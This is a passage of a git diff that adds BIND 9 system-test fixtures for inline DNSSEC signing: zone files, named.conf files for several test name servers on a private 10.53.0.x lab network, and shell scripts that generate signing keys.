../ns6/trusted.conf diff --git a/bin/tests/system/inline/ns2/bits.db.in b/bin/tests/system/inline/ns2/bits.db.in new file mode 100644 index 0000000..2652047 --- /dev/null +++ b/bin/tests/system/inline/ns2/bits.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns2 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/inline/ns2/named.conf.in b/bin/tests/system/inline/ns2/named.conf.in new file mode 100644 index 0000000..3ad6d96 --- /dev/null +++ b/bin/tests/system/inline/ns2/named.conf.in @@ -0,0 +1,85 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; + allow-new-zones yes; +}; + +zone "bits" { + type primary; + file "bits.db"; + allow-update { any; }; +}; + +zone "retransfer" { + type primary; + file "retransfer.db"; + allow-update { any; }; + notify no; +}; + +zone "retransfer3" { + type primary; + file "retransfer3.db"; + allow-update { any; }; + allow-transfer { none; }; // changed dynamically by tests.sh + notify no; +}; + +zone "nsec3-loop" { + type primary; + file "nsec3-loop.db"; + notify no; +}; + +zone "inactiveksk" { + type primary; + file "inactiveksk.db"; + allow-update { any; }; +}; + +zone "inactivezsk" { + type primary; + file "inactivezsk.db"; + allow-update { any; }; +}; + +zone "nokeys" { + type primary; + file "nokeys.db"; + allow-update { any; }; +}; + +zone "removedkeys-secondary" { + type primary; + file "removedkeys-secondary.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/inline/ns2/nsec3-loop.db.in b/bin/tests/system/inline/ns2/nsec3-loop.db.in new file mode 100644 index 0000000..d12af8d --- /dev/null +++ b/bin/tests/system/inline/ns2/nsec3-loop.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; NOTE: This zone's data has been crafted in order to reproduce a very specific +; scenario (see ns7/named.conf for more details). Please do not modify this +; file. + +$TTL 300 ; 5 minutes +@ IN SOA ns2 . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/inline/ns3/include.db.in b/bin/tests/system/inline/ns3/include.db.in new file mode 100644 index 0000000..c46a6a8 --- /dev/null +++ b/bin/tests/system/inline/ns3/include.db.in @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +f A 10.0.0.7 diff --git a/bin/tests/system/inline/ns3/master.db.in b/bin/tests/system/inline/ns3/master.db.in new file mode 100644 index 0000000..4d30cf6 --- /dev/null +++ b/bin/tests/system/inline/ns3/master.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/inline/ns3/master2.db.in b/bin/tests/system/inline/ns3/master2.db.in new file mode 100644 index 0000000..24a0666 --- /dev/null +++ b/bin/tests/system/inline/ns3/master2.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042408 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master3.db.in b/bin/tests/system/inline/ns3/master3.db.in new file mode 100644 index 0000000..f3062c3 --- /dev/null +++ b/bin/tests/system/inline/ns3/master3.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042409 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master4.db.in b/bin/tests/system/inline/ns3/master4.db.in new file mode 100644 index 0000000..737e2e2 --- /dev/null +++ b/bin/tests/system/inline/ns3/master4.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 hostmaster. ( + 2000042410 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master5.db.in b/bin/tests/system/inline/ns3/master5.db.in new file mode 100644 index 0000000..a1e1300 --- /dev/null +++ b/bin/tests/system/inline/ns3/master5.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042411 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master6.db.in b/bin/tests/system/inline/ns3/master6.db.in new file mode 100644 index 0000000..de3e651 --- /dev/null +++ b/bin/tests/system/inline/ns3/master6.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042412 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 + +$INCLUDE missingfile.db diff --git a/bin/tests/system/inline/ns3/master7.db.in b/bin/tests/system/inline/ns3/master7.db.in new file mode 100644 index 0000000..a3e33e7 --- /dev/null +++ b/bin/tests/system/inline/ns3/master7.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042412 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 + +$INCLUDE include.db diff --git a/bin/tests/system/inline/ns3/named.conf.in b/bin/tests/system/inline/ns3/named.conf.in new file mode 100644 index 0000000..dc14fe9 --- /dev/null +++ b/bin/tests/system/inline/ns3/named.conf.in @@ -0,0 +1,179 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + try-tcp-refresh no; + notify-delay 0; + allow-new-zones yes; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + allow-update-forwarding { any; }; + file "bits.bk"; + sig-signing-signatures 1; // force incremental processing +}; + +server 10.53.0.4 { request-ixfr no; }; + +zone "noixfr" { + type secondary; + primaries { 10.53.0.4; }; + inline-signing yes; + auto-dnssec maintain; + allow-update-forwarding { any; }; + file "noixfr.bk"; +}; + +zone "master" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "master.db"; + notify explicit; + also-notify { + 10.53.0.3; + }; +}; + +zone "dynamic" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "dynamic.db"; +}; + +zone "updated" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { none; }; + file "updated.db"; +}; + +zone "expired" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "expired.db"; +}; + +zone "retransfer" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "retransfer.bk"; +}; + +zone "nsec3" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "nsec3.db"; +}; + +zone "externalkey" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "externalkey.db"; +}; + +zone "retransfer3" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "retransfer3.bk"; +}; + +zone "inactiveksk" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + dnssec-dnskey-kskonly yes; + file "inactiveksk.bk"; +}; + +zone "inactivezsk" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "inactivezsk.bk"; +}; + +zone "nokeys" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "nokeys.bk"; +}; + +zone "delayedkeys" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "delayedkeys.db"; +}; + +zone "removedkeys-primary" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + also-notify { 10.53.0.2; }; + file "removedkeys-primary.db"; +}; + +zone "removedkeys-secondary" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "removedkeys-secondary.bk"; +}; + +zone "unsupported" { + type primary; + file "unsupported.db"; + inline-signing yes; + auto-dnssec maintain; +}; diff --git a/bin/tests/system/inline/ns3/sign.sh b/bin/tests/system/inline/ns3/sign.sh new file mode 100755 index 0000000..7e33046 --- /dev/null +++ b/bin/tests/system/inline/ns3/sign.sh @@ -0,0 +1,160 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# Fake an unsupported key +unsupportedkey=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone unsupported) +awk '$3 == "DNSKEY" { $6 = 255 } { print }' ${unsupportedkey}.key > ${unsupportedkey}.tmp +mv ${unsupportedkey}.tmp ${unsupportedkey}.key + +zone=bits +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=noixfr +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=master +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=dynamic +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=updated +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db +$SIGNER -S -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null +cp master2.db.in updated.db + +# signatures are expired and should be regenerated on startup +zone=expired +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db +$SIGNER -PS -s 20100101000000 -e 20110101000000 -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null + +zone=retransfer +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=nsec3 +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=retransfer3 +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=inactiveksk +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -P now -A now+3600 -f KSK $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=inactivezsk +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -P now -A now+3600 $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=delayedkeys +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +# Keys for the "delayedkeys" zone should not be initially accessible. +mv K${zone}.+*+*.* ../ + +zone=removedkeys-primary +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +zone=removedkeys-secondary +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +for s in a c d h k l m q z +do + zone=test-$s + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +done + +for s in b f i o p t v +do + zone=test-$s + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +done + +zone=externalkey +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private + +for alg in ${DEFAULT_ALGORITHM} ${ALTERNATIVE_ALGORITHM} +do + k1=$($KEYGEN -q -a $alg -n zone -f KSK $zone) + k2=$($KEYGEN -q -a $alg -n zone $zone) + k3=$($KEYGEN -q -a $alg -n zone $zone) + k4=$($KEYGEN -q -a $alg -n zone -f KSK $zone) + $DSFROMKEY -T 1200 $k4 >> ../ns1/root.db + + # Convert k1 and k2 in to External Keys. + rm -f $k1.private + mv $k1.key a-file + $IMPORTKEY -P now -D now+3600 -f a-file $zone > /dev/null 2>&1 || + ( echo_i "importkey failed: $alg" ) + rm -f $k2.private + mv $k2.key a-file + $IMPORTKEY -f a-file $zone > /dev/null 2>&1 || + ( echo_i "importkey failed: $alg" ) +done diff --git a/bin/tests/system/inline/ns4/named.conf.in b/bin/tests/system/inline/ns4/named.conf.in new file mode 100644 index 0000000..fed200a --- /dev/null +++ b/bin/tests/system/inline/ns4/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; +}; + +zone "noixfr" { + type primary; + file "noixfr.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/inline/ns4/noixfr.db.in b/bin/tests/system/inline/ns4/noixfr.db.in new file mode 100644 index 0000000..c40f011 --- /dev/null +++ b/bin/tests/system/inline/ns4/noixfr.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns4 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns4 A 10.53.0.4 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/inline/ns5/named.conf.post b/bin/tests/system/inline/ns5/named.conf.post new file mode 100644 index 0000000..f454b35 --- /dev/null +++ b/bin/tests/system/inline/ns5/named.conf.post @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; + servfail-ttl 0; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + file "bits.bk"; + auto-dnssec maintain; + inline-signing yes; +}; diff --git a/bin/tests/system/inline/ns5/named.conf.pre b/bin/tests/system/inline/ns5/named.conf.pre new file mode 100644 index 0000000..91844ac --- /dev/null +++ b/bin/tests/system/inline/ns5/named.conf.pre @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + file "bits.bk"; +}; diff --git a/bin/tests/system/inline/ns6/named.conf.in b/bin/tests/system/inline/ns6/named.conf.in new file mode 100644 index 0000000..215fd58 --- /dev/null +++ b/bin/tests/system/inline/ns6/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + notify-delay 0; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/inline/ns7/named.conf.in b/bin/tests/system/inline/ns7/named.conf.in new file mode 100644 index 0000000..3a0cf86 --- /dev/null +++ b/bin/tests/system/inline/ns7/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * NS7 + * + * NOTE: This named instance is used to reproduce a scenario which involves a + * number of functions getting called in a very specific order which results in + * an infinite loop while iterating over NSEC3 red-black tree. Ensuring this + * happens requires carefully setting the number of signing keys, NSEC3 + * parameters (number of iterations and salt value), zone data and named + * configuration. Changing any of these and/or influencing this instance's + * behavior (e.g. by sending extra queries to it) might render this test moot + * as it will no longer be able to reproduce the exact scenario it attempts to. + * + * Given the above, please do not use this instance for any other test than the + * one it was meant for. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + notify no; + try-tcp-refresh no; + allow-new-zones yes; + sig-signing-nodes 100; + sig-signing-signatures 10; +}; diff --git a/bin/tests/system/inline/ns7/sign.sh b/bin/tests/system/inline/ns7/sign.sh new file mode 100755 index 0000000..462d6ad --- /dev/null +++ b/bin/tests/system/inline/ns7/sign.sh @@ -0,0 +1,25 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# NOTE: The number of signing keys generated below is not coincidental. More +# details can be found in the comment inside ns7/named.conf. + +zone=nsec3-loop +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) diff --git a/bin/tests/system/inline/ns8/example.com.db.in b/bin/tests/system/inline/ns8/example.com.db.in new file mode 100644 index 0000000..dfc7630 --- /dev/null +++ b/bin/tests/system/inline/ns8/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/inline/ns8/example.db.in b/bin/tests/system/inline/ns8/example.db.in new file mode 100644 